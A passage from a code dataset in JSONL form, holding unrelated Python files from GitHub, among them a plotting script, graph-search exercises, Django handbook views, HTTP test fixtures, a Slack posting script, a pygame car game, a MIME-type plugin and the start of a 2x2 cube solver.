case == 'eigenvalues':\n # series[1:] = [np.sign(s) * np.log10(np.abs(s) + 1) for s in series[1:]]\n series[1:] = [np.log10(np.abs(s) + 1) for s in series[1:]]\n\n fig, axes = plt.subplots(nrows=nrows, sharex=True)\n\n if nrows == 1:\n axes = [axes]\n plot_multiple(axes[0], t, zip(styles, header[1:], series[1:]))\n elif nrows == 2:\n plot_multiple(axes[0], t, zip(styles[:-1], header[1:-1], series[1:-1]))\n plot_multiple(axes[1], t, [(styles[-1], header[-1], series[-1])])\n\n axes[0].set_title(title)\n axes[0].set_ylim(ylim)\n axes[-1].set_xlabel(header[0])\n for ax in axes:\n ax.legend(framealpha=0.9, loc='upper right')\n if ticks is not None:\n axes[-1].set_xlim((0.0, ticks[-1] + 0.5))\n axes[-1].set_xticks(ticks)\n fig.savefig(out_filename, dpi=300)\n\ndef plot_multiple(ax, x, it):\n for i, (style, label, data) in enumerate(it):\n mask = ~np.isnan(data)\n x_ = x[mask]\n data = data[mask]\n ax.plot(x_, data, label=label, zorder=-i, **style)\n\ndef main():\n parser = argparse.ArgumentParser(description='Plot.')\n parser.add_argument('infile', action='store')\n parser.add_argument('outfile', action='store')\n parser.add_argument('--time-series', action='store_true', default=False)\n parser.add_argument('--eigenvalues', action='store_true', default=False)\n parser.add_argument('--ticks', action='store', default=None)\n parser.add_argument('--nrows', action='store', type=int, default=1)\n parser.add_argument('--title', action='store', default='')\n args = parser.parse_args()\n\n if args.ticks is not None:\n args.ticks = [x\n for xs in read_csv(args.ticks, has_header=False)[1]\n for x in xs]\n args.ticks = [round(x, 1) for x in args.ticks]\n # print('Using ticks override: {}'.format(args.ticks))\n\n if args.time_series:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=args.nrows,\n ticks=args.ticks,\n title=args.title)\n\n if args.eigenvalues:\n plot_time_series(\n csv_filename=args.infile,\n out_filename=args.outfile,\n nrows=1,\n case='eigenvalues',\n ticks=args.ticks,\n title=r'Energy eigenvalues')\n\nmain()\n","repo_name":"YodaEmbedding/experiments","sub_path":"fortran/phys395_hw5/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"24881268882","text":"from collections import deque\n\n# Definition who is seller from persons\ndef person_is_seller(name):\n return name[-1] == 'm'\n\n# Implementation breadth-first search algorithm\ndef breadth_search(name):\n search_queue = deque()\n search_queue += graph[\"You\"]\n searched = []\n while search_queue:\n person = search_queue.popleft()\n if not person in searched:\n if person_is_seller(person):\n print(person + \" is a mango seller!\")\n return True\n else:\n search_queue += graph[person]\n searched.append(person)\n return False\n\n# Define friends graph\ngraph = {}\ngraph[\"You\"] = [\"Alice\", \"Bob\", \"Claire\"]\ngraph[\"Bob\"] = [\"Anuj\", \"Peggy\"]\ngraph[\"Alice\"] = [\"Peggy\"]\ngraph[\"Claire\"] = [\"Thom\", \"Jonny\"]\ngraph[\"Anuj\"] = []\ngraph[\"Peggy\"] = []\ngraph[\"Thom\"] = []\ngraph[\"Jonny\"] = []\n\nif (not breadth_search(\"You\")):\n print(\"Mango sellers not found\")\n","repo_name":"grawitti/py_samples","sub_path":"grokking_algo/breadth_first_search.py","file_name":"breadth_first_search.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} 
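A side note on the breadth_first_search.py record above: it tracks visited nodes in a Python list, so each `if not person in searched` check is O(n). Below is a minimal generalized sketch of the same search using a set instead; the name `bfs_find` and the `predicate` parameter are illustrative, not from the record, and unlike the record this version also tests the start node itself.

from collections import deque

def bfs_find(graph, start, predicate):
    # Generic BFS over an adjacency-dict graph shaped like the record's
    # `graph`; returns the first reachable node satisfying `predicate`.
    queue = deque([start])
    visited = set()  # O(1) membership checks vs. O(n) for a list
    while queue:
        node = queue.popleft()
        if node in visited:
            continue
        visited.add(node)
        if predicate(node):
            return node
        queue.extend(graph[node])
    return None

# With the record's friends graph: bfs_find(graph, "You",
# lambda name: name[-1] == "m") returns "Thom".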
+{"seq_id":"11308723246","text":"import unittest\nfrom copy import deepcopy\ntry:\n from unittest.mock import patch\nexcept ImportError:\n from mock import patch\n\n\nclass BaseWebRichObjectTestCase(unittest.TestCase):\n url = 'http://example.com'\n\n def _get_mock_attrs(self):\n func = getattr(self, self._testMethodName)\n return getattr(func, 'mock_attrs', None)\n\n def setUp(self):\n mock_attrs = self._get_mock_attrs()\n if mock_attrs is not None:\n self.patch = patch('web_rich_object.api.urlopen', **mock_attrs)\n self.patch.start()\n\n def tearDown(self):\n if self._get_mock_attrs() is not None:\n self.patch.stop()\n\nHTML_RESPONSE_INFO = {\n 'dict': {\n 'accept-ranges': 'bytes',\n 'cache-control': 'max-age=900',\n 'connection': 'close',\n 'content-length': '59593',\n 'content-type': 'text/html; charset=UTF-8',\n 'date': 'Sat, 17 Dec 2016 20:52:48 GMT',\n 'expires': 'Sat, 17 Dec 2016 21:06:53 GMT',\n 'server': 'Apache',\n 'x-adobe-content': 'AEM',\n 'x-ua-compatible': 'IE=11'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Server: Apache\\r\\n',\n 'X-UA-Compatible: IE=11\\r\\n',\n 'X-Adobe-Content: AEM\\r\\n',\n 'Accept-Ranges: bytes\\r\\n',\n 'Cache-Control: max-age=900\\r\\n',\n 'Expires: Sat, 17 Dec 2016 21:06:53 GMT\\r\\n',\n 'Content-Type: text/html; charset=UTF-8\\r\\n',\n 'Date: Sat, 17 Dec 2016 20:52:48 GMT\\r\\n',\n 'Content-Length: 59593\\r\\n',\n 'Content-Language: PT\\r\\n',\n 'Connection: close\\r\\n'\n ],\n 'maintype': 'text',\n 'plist': ['charset=UTF-8'],\n 'plisttext': '; charset=UTF-8',\n 'seekable': 0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'html',\n 'type': 'text/html',\n 'typeheader': 'text/html; charset=UTF-8',\n 'unixfrom': ''\n}\n\nPDF_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\nPDF_RESPONSE_INFO['maintype'] = 'application'\nPDF_RESPONSE_INFO['type'] = 'application'\nPDF_RESPONSE_INFO['subtype'] = 'pdf'\n\nIMAGE_RESPONSE_INFO = {\n 'dict': {\n 'cache-control': 'public, max-age=315360000',\n 'cf-cache-status': 'MISS',\n 'cf-ray': '312f513938bc6224-LIS',\n 'connection': 'close',\n 'content-length': '12141',\n 'content-type': 'image/png',\n 'date': 'Sun, 18 Dec 2016 02:52:11 GMT',\n 'etag': '\"63045090f550f37601888be65832f3e6\"',\n 'expires': 'Wed, 16 Dec 2026 02:52:11 GMT',\n 'last-modified': 'Tue, 18 Aug 2015 14:43:38 GMT',\n 'server': 'cloudflare-nginx',\n 'set-cookie': '__cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly',\n 'vary': 'Accept-Encoding',\n 'x-amz-storage-class': 'REDUCED_REDUNDANCY',\n 'x-amz-version-id': '4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL'\n },\n 'encodingheader': None,\n 'fp': None,\n 'headers': [\n 'Date: Sun, 18 Dec 2016 02:52:11 GMT\\r\\n',\n 'Content-Type: image/png\\r\\n',\n 'Content-Length: 12141\\r\\n',\n 'Connection: close\\r\\n',\n 'Set-Cookie: __cfduid=dd3b9155f31aac201599f9a237f5457e41482029531; expires=Mon, 18-Dec-17 02:52:11 GMT; path=/; domain=.imgur.com; HttpOnly\\r\\n',\n 'Cache-Control: public, max-age=315360000\\r\\n',\n 'ETag: \"63045090f550f37601888be65832f3e6\"\\r\\n',\n 'Expires: Wed, 16 Dec 2026 02:52:11 GMT\\r\\n',\n 'Last-Modified: Tue, 18 Aug 2015 14:43:38 GMT\\r\\n',\n 'x-amz-storage-class: REDUCED_REDUNDANCY\\r\\n',\n 'x-amz-version-id: 4fxFOV0qAhyGrAviTh37dKrZfC5qu2hL\\r\\n',\n 'CF-Cache-Status: MISS\\r\\n',\n 'Vary: Accept-Encoding\\r\\n',\n 'Server: cloudflare-nginx\\r\\n',\n 'CF-RAY: 312f513938bc6224-LIS\\r\\n'\n ],\n 'maintype': 'image',\n 'plist': [],\n 'plisttext': '',\n 'seekable': 
0,\n 'startofbody': None,\n 'startofheaders': None,\n 'status': '',\n 'subtype': 'png',\n 'type': 'image/png',\n 'typeheader': 'image/png',\n 'unixfrom': ''\n}\n\nUNKNOW_RESPONSE_INFO = deepcopy(HTML_RESPONSE_INFO)\ndel PDF_RESPONSE_INFO['headers'][UNKNOW_RESPONSE_INFO['headers'].index('Content-Language: PT\\r\\n')]\n","repo_name":"ZuluPro/web-rich-object","sub_path":"web_rich_object/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73353952115","text":"from valetapp.models.Booking.booking import Booking\nfrom valetapp.models.Users.customer import Customer\nfrom valetapp.models.Store.chainstore import ChainStore\nfrom valetapp.models.Valet.valet import Valet\nfrom valetapp.models.Users.membershiptype import MembershipType\nfrom valetapp.models.Users.staff import Staff\nfrom valetapp.views.Visitor.concreteVisitor import ConcreteVisitor\nfrom django.shortcuts import render\n\n\ndef getVisitor(request):\n bookings = Booking.objects.all()\n customers = Customer.objects.all()\n stores = ChainStore.objects.all()\n valets = Valet.objects.all()\n membershipTypes = MembershipType.objects.all()\n staffs = Staff.objects.all()\n visitor = ConcreteVisitor()\n\n total_sum = 0\n customer_emails_for_promotions = []\n store_names = []\n valet_types = []\n membership_types = []\n staff_members = []\n\n for booking in bookings:\n total_sum += booking.accept(visitor)\n for customer in customers:\n customer_emails_for_promotions.append(customer.accept(visitor))\n for store in stores:\n store_names.append(store.accept(visitor))\n for valet in valets:\n valet_types.append(valet.accept(visitor))\n for membershipType in membershipTypes:\n membership_types.append(membershipType.accept(visitor))\n for staff in staffs:\n staff_members.append(staff.accept(visitor))\n\n money_made_by_each_store = get_money_made_by_each_store(bookings, stores)\n\n export_to_CSV_object = {\n 'total_sum': total_sum,\n 'customers': customer_emails_for_promotions,\n 'store_names': store_names,\n 'valet_types': valet_types,\n 'membership_types': membership_types,\n 'staff_members': staff_members,\n 'money_made_by_each_store': money_made_by_each_store\n }\n\n return render(request, \"Booking/booking_list.html\", {'export_data': export_to_CSV_object})\n\n\ndef get_money_made_by_each_store(bookings, stores):\n money_made_by_store = []\n for store in stores:\n store_total = 0\n for booking in bookings:\n if(booking.get_store() == store):\n store_total += booking.get_price()\n money_made_by_store.append((store.get_name(), store_total))\n return money_made_by_store\n","repo_name":"dylank09/ValetSystem","sub_path":"valetproject/valetapp/views/Visitor/exportToCSV.py","file_name":"exportToCSV.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"70301885233","text":"from django.shortcuts import render, render_to_response, redirect\nfrom HandBook.models import Class, Group, SubGroup, Company, HandBook\nfrom Elements.models import Element\nfrom Profile.models import Profile\nimport json\nfrom django.http.response import HttpResponse\nfrom django.template.context_processors import csrf\nimport pandas as pd\nfrom HandBook.export_Excel import export_df_to_excel\nfrom HandBook.export_PDF import export_df_to_pdf\nimport os\n\n# ----------------------------------- FUNCTIONS FOR CREATED HANDBOOK 
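A note on the tests/utils.py record above: `BaseWebRichObjectTestCase.setUp` looks for a `mock_attrs` dict on the running test method and forwards it as keyword arguments to `mock.patch`, which passes them on to the replacement MagicMock. Below is a hypothetical sketch of how a subclass might attach those attributes; the `with_mock_attrs` helper and the test class are illustrative assumptions, not part of the record.

def with_mock_attrs(**attrs):
    # Hypothetical helper: store the kwargs on the test function so that
    # _get_mock_attrs() finds them and setUp() hands them to patch().
    def decorator(test_func):
        test_func.mock_attrs = attrs
        return test_func
    return decorator

class HtmlObjectTests(BaseWebRichObjectTestCase):
    # Mock accepts dotted configuration keys, so this makes the patched
    # urlopen(...) return an object whose info() yields the HTML fixture.
    @with_mock_attrs(**{'return_value.info.return_value': HTML_RESPONSE_INFO})
    def test_uses_html_fixture(self):
        pass  # web_rich_object.api.urlopen is patched for this test only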
-------------------------\n\n\ndef remove_files(request):\n # filepath = 'QualificationWork/static/ExportFiles/'\n filepath = 'static/ExportFiles/'\n excel_file = filepath + request.user.username + '_excel_file.xlsx'\n pdf_file = filepath + request.user.username + '_pdf_file.pdf'\n os.remove(excel_file)\n os.remove(pdf_file)\n return HttpResponse('200')\n\n\ndef element_parameters(element, fields):\n fields_list = []\n for field in fields:\n parameter = element.__getattribute__(field)\n if not hasattr(parameter, 'name'):\n fields_list.append(parameter)\n else:\n fields_list.append(parameter.name)\n return fields_list\n\n\ndef create_dataframe(required_elements, elements_indexes=False):\n if elements_indexes:\n elements_ids = []\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n elements_ids.append(element.id)\n df.drop(['id'], axis=1, inplace=True)\n return df, elements_ids\n else:\n fields = [field.name for field in Element._meta.get_fields()]\n df = pd.DataFrame(columns=fields)\n for index_element, element in enumerate(required_elements):\n df.loc[index_element] = element_parameters(element, fields)\n df.drop(['id'], axis=1, inplace=True)\n return df\n\n\ndef create_handbook(request):\n args = {}\n args.update(csrf(request))\n args.update({\"username\": request.user.username})\n # file_path = 'QualificationWork/static/ExportFiles/'\n file_path = 'static/ExportFiles/'\n links = {\"pdf\": file_path + str(request.user.username) + '_pdf_file',\n \"excel\": file_path + str(request.user.username) + '_excel_file'}\n if request.POST:\n required_elements = [element for element in Element.objects.all() if request.POST.get(\"3_\" + str(element.id)) is not None]\n if len(required_elements) != 0:\n df, elements_ids = create_dataframe(required_elements, True)\n request.user.profile.set_coins(request.POST.get(\"coins\"))\n request.user.profile.save()\n handbook = HandBook(user=request.user,\n handbook_name=request.POST.get(\"handbook_name\"))\n handbook.set_elements(elements_ids)\n handbook.save()\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n args.update({\"columns\": df.columns})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n return render_to_response(\"createdHandbookExtension.html\", args)\n else:\n elements_ids = HandBook.objects.get(id=request.GET['handbook']).get_elements_ids()\n elements = Element.objects.filter(pk__in=elements_ids)\n df = create_dataframe(elements)\n export_df_to_pdf(df, filename=links.get(\"pdf\"))\n export_df_to_excel(df, filename=links.get(\"excel\"))\n args.update({\"elements\": df.values.tolist()})\n df_columns_names = ['Название', 'Компания', 'Класс', 'Группа', 'Подгруппа', 'Средняя наработка на отказ',\n 'Средний срок сохраняемости', 'Средний ресурс (ч)', 'Среднее время восстановления (ч)',\n 'Дополнительная Информация', 'Дата добавления', 'Подтверждающая ссылка']\n args.update({\"columns\": df_columns_names})\n args.update({\"links\": links})\n return render_to_response(\"createdHandbookExtension.html\", args)\n\n\ndef delete_handbook(request):\n handbook_id = request.GET[\"id\"]\n handbook = HandBook.objects.get(id=handbook_id)\n handbook.delete()\n return redirect(\"/personal_account\")\n\n# 
----------------------------------- FUNCTIONS FOR CREATING HANDBOOK -------------------------\n\n\ndef create_unique_id(object):\n models = [Class, Group, SubGroup, Element]\n for index, model in enumerate(models):\n if isinstance(object, model):\n return str(index) + \"_\" + str(object.id)\n\n\ndef choose_elements(request):\n args = {}\n args.update(csrf(request))\n classes = [{\"id\": create_unique_id(_class), \"name\": _class.name} for _class in Class.objects.all()]\n args.update({\"classes\": classes})\n args.update({\"username\": request.user.username})\n args.update({\"user\": request.user})\n return render_to_response(\"handbookCreatingExtension.html\", args)\n\n\ndef get_data_for_removing(id, model):\n if model is Class:\n groups = [object for object in Group.objects.filter(class_id=Class.objects.get(id=id))]\n subgroups = sum([[object for object in SubGroup.objects.filter(group_id=group)] for group in groups], [])\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (groups + subgroups + elements)]\n if model is Group:\n subgroups = [object for object in SubGroup.objects.filter(group_id=Group.objects.get(id=id))]\n elements = sum([[object for object in Element.objects.filter(Subgroup_id=subgroup)] for subgroup in subgroups], [])\n return [create_unique_id(object) for object in (subgroups + elements)]\n if model is SubGroup:\n return [create_unique_id(object) for object in Element.objects.filter(Subgroup_id=SubGroup.objects.get(id=id))]\n\n\ndef collect_data(request):\n data = []\n models = [Class, Group, SubGroup, Element]\n model_id, object_id = str(request.GET[\"id\"]).split(\"_\")\n model = models[int(model_id)]\n event = int(request.GET[\"event\"])\n if event == 0:\n if model is Class:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Group.objects.filter(class_id=Class.objects.get(id=object_id))]\n if model is Group:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in SubGroup.objects.filter(group_id=Group.objects.get(id=object_id))]\n if model is SubGroup:\n data = [{\"id\": create_unique_id(object), \"name\": object.name} for object in Element.objects.filter(Subgroup=SubGroup.objects.get(id=object_id))]\n else:\n data = get_data_for_removing(object_id, model)\n return HttpResponse(json.dumps(data))\n","repo_name":"Belket/QualificationWork","sub_path":"HandBook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28114062398","text":"# Kirjoita ohjelma, joka kysyy käyttäjältä viiden kaupungin nimet yksi kerrallaan (käytä for-toistorakennetta nimien kysymiseen) ja tallentaa ne listarakenteeseen. \n# Lopuksi ohjelma tulostaa kaupunkien nimet yksi kerrallaan allekkain samassa järjestyksessä kuin ne syötettiin. 
\n# käytä for-toistorakennetta nimien kysymiseen ja for/in toistorakennetta niiden läpikäymiseen.\n\ncities = []\n\nfor i in range(5):\n city = input(\"Kirjoita kaupungin nimi: \")\n cities.append(city)\n\nfor city in cities:\n print(city)","repo_name":"kassu11/AMK-python","sub_path":"module05-homework/5.4-kaupunkien-kysely.py","file_name":"5.4-kaupunkien-kysely.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33638020436","text":"import json\nimport slack # module is called slackclient\n\n# Local image taken from https://ccsearch.creativecommons.org/photos/a376def5-1f22-4e28-b2f0-8cf67398afa8\n\n# Load global config\nwith open(\"../network_config/slack.json\") as slack_f:\n slack_settings = json.load(slack_f)\n\nOATH = slack_settings[\"OAUTH_TOKEN\"]\nWEBHOOK_URL = slack_settings[\"WEBHOOK\"]\nUSEWEBHOOK = slack_settings[\"USE_WEBHOOK\"] # set 1 in ../network_config/slack.json if you can't use OATH (no graph though)\nSLACKCHANNEL = slack_settings[\"CHANNEL\"]\n\nwith open(\"blocks.json\", \"rt\") as block_f:\n data = json.load(block_f)\n\nclient = slack.WebClient(token=OATH)\n\nclient.files_upload(\n channels=SLACKCHANNEL,\n file=\"slacks.jpg\",\n title=\"Local File\"\n)\nclient.chat_postMessage(\n channel=SLACKCHANNEL,\n blocks=data\n)\n","repo_name":"FrancisCrickInstitute/network_modules","sub_path":"_slack_post.py","file_name":"_slack_post.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"21640744176","text":"import pygame\nimport math\nfrom pygame.locals import *\nfrom pygame.math import *\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 800\nWHITE = [255, 255, 255]\n\ndef rot_center(image, rect, angle):\n \"\"\"rotate an image while keeping its center\"\"\"\n rot_image = pygame.transform.rotate(image, angle)\n rot_rect = rot_image.get_rect(center=rect.center)\n return rot_image,rot_rect\n\nclass Car(pygame.sprite.Sprite):\n \n def __init__(self, color):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('car_'+color+'.png').convert_alpha()\n self.image = pygame.transform.scale(self.image, (int(SCREEN_WIDTH/20), int(SCREEN_HEIGHT/20)))\n self.image = pygame.transform.rotate(self.image, 90)\n self.original_image = self.image \n \n self.mask = pygame.mask.from_surface(self.image)\n \n self.rect = self.image.get_rect()\n self.rect[0] = 50 \n self.rect[1] = 100 \n \n self.position = Vector2((self.rect[0], self.rect[1]))\n self.direction = Vector2(1, 0)\n \n self.speed = 0\n self.angle_speed = 0\n self.angle = 0\n #self.image, self.rect = rot_center(self.image, self.rect, 90)\n \n def update(self):\n if(self.angle_speed != 0):\n self.direction.rotate_ip(self.angle_speed)\n self.angle += self.angle_speed\n self.image = pygame.transform.rotate(self.original_image, -self.angle)\n self.rect = self.image.get_rect(center = self.rect.center)\n self.position += self.direction * self.speed\n self.rect.center = self.position\n \n #print(pygame.Surface.get_at((self.rect[0], self.rect[1])))\nclass Background(pygame.sprite.Sprite):\n \n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pista.png')\n self.image = pygame.transform.scale(self.image, (SCREEN_WIDTH, SCREEN_HEIGHT))\n #self.mask = pygame.mask.from_threshold(self.image, pygame.Color('black'))\n self.mask = pygame.mask.from_surface(self.image)\n self.rect = self.image.get_rect()\ndef 
clear_callback(surf, rect):\n color = 255, 255, 255\n surf.fill(color, rect)\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nscreen.fill(WHITE)\n\nbackground_group = pygame.sprite.Group()\nBACKGROUND = Background()\nbackground_group.add(BACKGROUND)\n\ncar_group = pygame.sprite.Group()\ncar = Car('red')\ncar_group.add(car)\n\n\n\nclock = pygame.time.Clock()\nwhile True:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n car.speed += 1\n elif event.key == pygame.K_DOWN:\n car.speed -= 1\n elif event.key == pygame.K_LEFT:\n car.angle_speed = -3\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 3\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n car.angle_speed = 0\n elif event.key == pygame.K_RIGHT:\n car.angle_speed = 0\n clear_callback(screen, car.rect)\n screen.blit(BACKGROUND.image, (0, 0))\n car_group.update()\n car_group.draw(screen)\n\n\n \n pygame.display.update()\n \n\n if(pygame.sprite.groupcollide(car_group, background_group, False, False, pygame.sprite.collide_mask)):\n print(\"GAME OVER\")\n break\n\npygame.quit()\n","repo_name":"Iwazo8700/race_ia","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"10246170641","text":"# -*- coding:utf-8 -*-\n\n\nfrom collections import deque\nfrom graph import Undigraph\n\n\ndef print_vertex_trace(prev, s, t, level=1):\n if prev[t] != -1 and t != s:\n print_vertex_trace(prev, s, prev[t], level+1)\n if level == 1:\n print(\"%d\" % t)\n else:\n print(\"%d -> \" % t, end=\"\")\n\n\ndef bfs(graph, s, t):\n if s == t:\n return \n queue = deque()\n prev = [ -1 ] * len(graph)\n visited = [False] * len(graph)\n visited[s] = True\n queue.append(s)\n while len(queue) > 0:\n vertex = queue.popleft()\n for adj_v in graph[vertex]:\n if not visited[adj_v]:\n prev[adj_v] = vertex\n if adj_v == t:\n return prev\n visited[adj_v] = True\n queue.append(adj_v)\n return prev\n\n\ndef recursive_dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n found = False\n def rdfs(s, t):\n nonlocal found\n if s == t:\n found = True\n return \n for v in graph[s][::-1]:\n if not visited[v]:\n visited[v] = True\n prev[v] = s\n rdfs(v, t)\n rdfs(s, t)\n return prev\n\n\ndef dfs(graph, s, t):\n prev = [-1] * len(graph)\n visited = [False] * len(graph)\n stk = [s]\n visited[s] = True\n while len(stk) > 0:\n vertex = stk.pop()\n for v in graph[vertex]:\n if not visited[v]:\n prev[v] = vertex\n if t == v:\n return prev\n visited[v] = True\n stk.append(v)\n \n\nif __name__ == '__main__':\n g = Undigraph(8)\n g.add_edge(0, 1)\n g.add_edge(0, 3)\n g.add_edge(1, 2)\n g.add_edge(1, 4)\n g.add_edge(2, 5)\n g.add_edge(3, 4)\n g.add_edge(4, 5)\n g.add_edge(4, 6)\n g.add_edge(5, 7)\n g.add_edge(6, 7)\n print(g)\n bfs_prev = bfs(g, 0, 7)\n print_vertex_trace(bfs_prev, 0, 7)\n dfs_prev = recursive_dfs(g, 0, 7)\n print_vertex_trace(dfs_prev, 0, 7) \n dfs2_prev = dfs(g, 0, 7)\n print_vertex_trace(dfs2_prev, 0, 7) \n","repo_name":"free-free/algorithm","sub_path":"graph/graph_search.py","file_name":"graph_search.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"70266341873","text":"from typing import Union, Optional\n\nimport magic\n\nfrom 
d20.Manual.BattleMap import FileObject\nfrom d20.Manual.Templates import (NPCTemplate,\n registerNPC)\nfrom d20.Manual.Facts import (MimeTypeFact, # type: ignore\n Fact)\n\n\n# Process basic information to initially populate fact table\n@registerNPC(\n name=\"MimeTypeNPC\",\n description=(\"This NPC provides the mimetype of an object.\"),\n creator=\"Mike Goffin\",\n version=\"0.1\",\n engine_version=\"0.1\"\n)\nclass MimeTypeNPC(NPCTemplate):\n def __init__(self, **kwargs: str) -> None:\n super().__init__(**kwargs)\n\n def handleData(self, **kwargs: FileObject) -> None:\n if 'data' not in kwargs:\n raise RuntimeError(\"Expected 'data' in arguments\")\n\n dataObj: FileObject = kwargs['data']\n data: Union[bytes, bytearray, memoryview] = dataObj.data\n try:\n mimetype: Optional[str] = magic.from_buffer(data, mime=True)\n except Exception:\n mimetype = None\n if mimetype:\n mimetype = mimetype.split(';')[0]\n else:\n mimetype = None\n try:\n filetype: Optional[str] = magic.from_buffer(data)\n except Exception:\n filetype = 'Unknown'\n mimetypeFact: Fact = MimeTypeFact(\n mimetype=mimetype,\n filetype=filetype,\n parentObjects=[dataObj.id]\n )\n self.console.addFact(mimetypeFact)\n","repo_name":"MITRECND/d20","sub_path":"d20/NPCS/MimeTypeNPC.py","file_name":"MimeTypeNPC.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"23764795140","text":"import random\nimport sys\nimport time\nimport sys\n\nMOVES = {\n \"U\": [2, 0, 3, 1, 20, 21, 6, 7, 4, 5, 10, 11, 12, 13, 14, 15, 8, 9, 18, 19, 16, 17, 22, 23],\n \"U'\": [1, 3, 0, 2, 8, 9, 6, 7, 16, 17, 10, 11, 12, 13, 14, 15, 20, 21, 18, 19, 4, 5, 22, 23],\n \"R\": [0, 9, 2, 11, 6, 4, 7, 5, 8, 13, 10, 15, 12, 22, 14, 20, 16, 17, 18, 19, 3, 21, 1, 23],\n \"R'\": [0, 22, 2, 20, 5, 7, 4, 6, 8, 1, 10, 3, 12, 9, 14, 11, 16, 17, 18, 19, 15, 21, 13, 23],\n \"F\": [0, 1, 19, 17, 2, 5, 3, 7, 10, 8, 11, 9, 6, 4, 14, 15, 16, 12, 18, 13, 20, 21, 22, 23],\n \"F'\": [0, 1, 4, 6, 13, 5, 12, 7, 9, 11, 8, 10, 17, 19, 14, 15, 16, 3, 18, 2, 20, 21, 22, 23],\n \"D\": [0, 1, 2, 3, 4, 5, 10, 11, 8, 9, 18, 19, 14, 12, 15, 13, 16, 17, 22, 23, 20, 21, 6, 7],\n \"D'\": [0, 1, 2, 3, 4, 5, 22, 23, 8, 9, 6, 7, 13, 15, 12, 14, 16, 17, 10, 11, 20, 21, 18, 19],\n \"L\": [23, 1, 21, 3, 4, 5, 6, 7, 0, 9, 2, 11, 8, 13, 10, 15, 18, 16, 19, 17, 20, 14, 22, 12],\n \"L'\": [8, 1, 10, 3, 4, 5, 6, 7, 12, 9, 14, 11, 23, 13, 21, 15, 17, 19, 16, 18, 20, 2, 22, 0],\n \"B\": [5, 7, 2, 3, 4, 15, 6, 14, 8, 9, 10, 11, 12, 13, 16, 18, 1, 17, 0, 19, 22, 20, 23, 21],\n \"B'\": [18, 16, 2, 3, 4, 0, 6, 1, 8, 9, 10, 11, 12, 13, 7, 5, 14, 17, 15, 19, 21, 23, 20, 22],\n}\n\nclass Cube:\n\n def __init__(self, string=\"WWWW RRRR GGGG YYYY OOOO BBBB\"):\n self.stateString = string.replace(\" \", \"\")\n self.solvedStateString=\"WWWWRRRRGGGGYYYYOOOOBBBB\"\n self.solvedState=[i for i in self.solvedStateString]\n self.moves=[ \"U\", \"U'\", \"R\" , \"R'\", \"F\" , \"F'\", \"D\" , \"D'\", \"L\" , \"L'\", \"B\" , \"B'\"]\n self.currState = [i for i in self.stateString]\n self.fixedPair={0:\"U D'\",1:\"R L'\",2:\"D U'\",3:\"F B'\",4:\"L R'\",5:\"B F'\"}\n\n def createStateList(self,state):\n return [[char for char in state[i:i+4]] for i in range(0, len(''.join(state)), 4)]\n\n def norm(self,fixedPoint):\n self.applyMovesStr(self.fixedPair[fixedPoint])\n\n def normalize(self):\n for j in range(4):\n for k in range(4):\n self.norm(0)\n if [self.stateString[10],self.stateString[12],self.stateString[19]] == 
